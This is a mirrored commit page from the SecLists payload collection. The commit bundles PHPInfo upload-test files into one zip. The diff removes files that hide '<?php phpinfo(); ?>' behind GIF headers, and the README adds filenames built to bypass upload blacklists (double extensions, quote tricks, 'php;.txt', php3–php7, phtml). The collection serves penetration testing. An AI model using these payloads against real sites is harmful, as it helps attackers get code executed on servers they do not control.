mirror of
https://github.com/danielmiessler/SecLists.git
synced 2025-04-30 02:36:27 -04:00
Zipped PHPInfo files
This commit is contained in:
parent
c8bc8eb242
commit
9be91ecd4e
29 changed files with 36 additions and 39 deletions
Payloads
PHPInfo.zip
PHPInfo
make-aio.shphpinfo-aio.tarphpinfo-aio.zipphpinfo-metadata.gifphpinfo-metadata.jpgphpinfo-shortsyntax.phpphpinfo.""gifphpinfo."gifphpinfo.''gifphpinfo.'gifphpinfo.jpg.phpphpinfo.phpphpinfo.php-1.gifphpinfo.php-2.gifphpinfo.php.""gifphpinfo.php."gifphpinfo.php.''gifphpinfo.php.'gifphpinfo.php3phpinfo.php4phpinfo.php5phpinfo.php7phpinfo.php;.txtphpinfo.phptphpinfo.phtphpinfo.phtmlphpinfo.txt
README.md
BIN
Payloads/PHPInfo.zip
Normal file
BIN
Payloads/PHPInfo.zip
Normal file
Binary file not shown.
|
@ -1,5 +0,0 @@
|
|||
#!/bin/sh
|
||||
zip phpinfo-aio.zip phpinfo*.{p*,txt,jp*g,gif}
|
||||
|
||||
tar -cvf phpinfo-aio.tar phpinfo*.{p*,txt,jp*g,gif}
|
||||
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Before ![]() (image error) Size: 7.2 KiB |
Binary file not shown.
Before ![]() (image error) Size: 74 KiB |
|
@ -1,3 +0,0 @@
|
|||
//tested on 7.2
|
||||
// even with short_open_tag=0
|
||||
<?=phpinfo()?>
|
|
@ -1,2 +0,0 @@
|
|||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
Before (image error) Size: 29 B |
|
@ -1,2 +0,0 @@
|
|||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
Before (image error) Size: 29 B |
|
@ -1,2 +0,0 @@
|
|||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
Before (image error) Size: 29 B |
|
@ -1,2 +0,0 @@
|
|||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
Before (image error) Size: 29 B |
|
@ -1 +0,0 @@
|
|||
<?php phpinfo(); ?>
|
|
@ -1 +0,0 @@
|
|||
<?php phpinfo(); ?>
|
|
@ -1,2 +0,0 @@
|
|||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
Before ![]() (image error) Size: 29 B |
|
@ -1 +0,0 @@
|
|||
GIF89a1
<?php phpinfo(); ?>
|
Before ![]() (image error) Size: 28 B |
|
@ -1,2 +0,0 @@
|
|||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
Before (image error) Size: 29 B |
|
@ -1,2 +0,0 @@
|
|||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
Before (image error) Size: 29 B |
|
@ -1,2 +0,0 @@
|
|||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
Before (image error) Size: 29 B |
|
@ -1,2 +0,0 @@
|
|||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
Before (image error) Size: 29 B |
|
@ -1 +0,0 @@
|
|||
<?php phpinfo(); ?>
|
|
@ -1 +0,0 @@
|
|||
<?php phpinfo(); ?>
|
|
@ -1 +0,0 @@
|
|||
<?php phpinfo(); ?>
|
|
@ -1 +0,0 @@
|
|||
<?php phpinfo(); ?>
|
|
@ -1 +0,0 @@
|
|||
<?php phpinfo(); ?>
|
|
@ -1 +0,0 @@
|
|||
<?php phpinfo(); ?>
|
|
@ -1 +0,0 @@
|
|||
<?php phpinfo(); ?>
|
|
@ -1 +0,0 @@
|
|||
<?php phpinfo(); ?>
|
|
@ -1 +0,0 @@
|
|||
<?php phpinfo(); ?>
|
|
@ -44,4 +44,39 @@ IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvali
|
|||
|
||||
## POC_img_phpinfo File
|
||||
|
||||
Outlined here: https://www.secgeek.net/bookfresh-vulnerability/
|
||||
Outlined here: https://www.secgeek.net/bookfresh-vulnerability/
|
||||
|
||||
|
||||
## PHPInfo.zip
|
||||
|
||||
This zip file containes files with filenames for bypassing blacklists and accessing `phpinfo.php`:
|
||||
|
||||
- ` make-aio.sh`
|
||||
- ` phpinfo-aio.tar`
|
||||
- ` phpinfo-aio.zip`
|
||||
- `'phpinfo.""gif'`
|
||||
- `'phpinfo."gif'`
|
||||
- `"phpinfo.''gif"`
|
||||
- `"phpinfo.'gif"`
|
||||
- ` phpinfo.jpg.php`
|
||||
- ` phpinfo-metadata.gif`
|
||||
- ` phpinfo-metadata.jpg`
|
||||
- ` phpinfo.php`
|
||||
- ` phpinfo.php-1.gif`
|
||||
- ` phpinfo.php-2.gif`
|
||||
- ` phpinfo.php3`
|
||||
- ` phpinfo.php4`
|
||||
- ` phpinfo.php5`
|
||||
- ` phpinfo.php7`
|
||||
- `'phpinfo.php.""gif'`
|
||||
- `'phpinfo.php."gif'`
|
||||
- `"phpinfo.php.''gif"`
|
||||
- `"phpinfo.php.'gif"`
|
||||
- ` phpinfo.phpt`
|
||||
- `'phpinfo.php;.txt'`
|
||||
- ` phpinfo.pht`
|
||||
- ` phpinfo.phtml`
|
||||
- ` phpinfo-shortsyntax.php`
|
||||
- ` phpinfo.txt`
|
||||
|
||||
It's impossible to unzip this file on Windows, due to their arbitrary filename restrictions. It's possible to unzip it in WSL though.
|
||||
|
|
Loading…
Add table
Reference in a new issue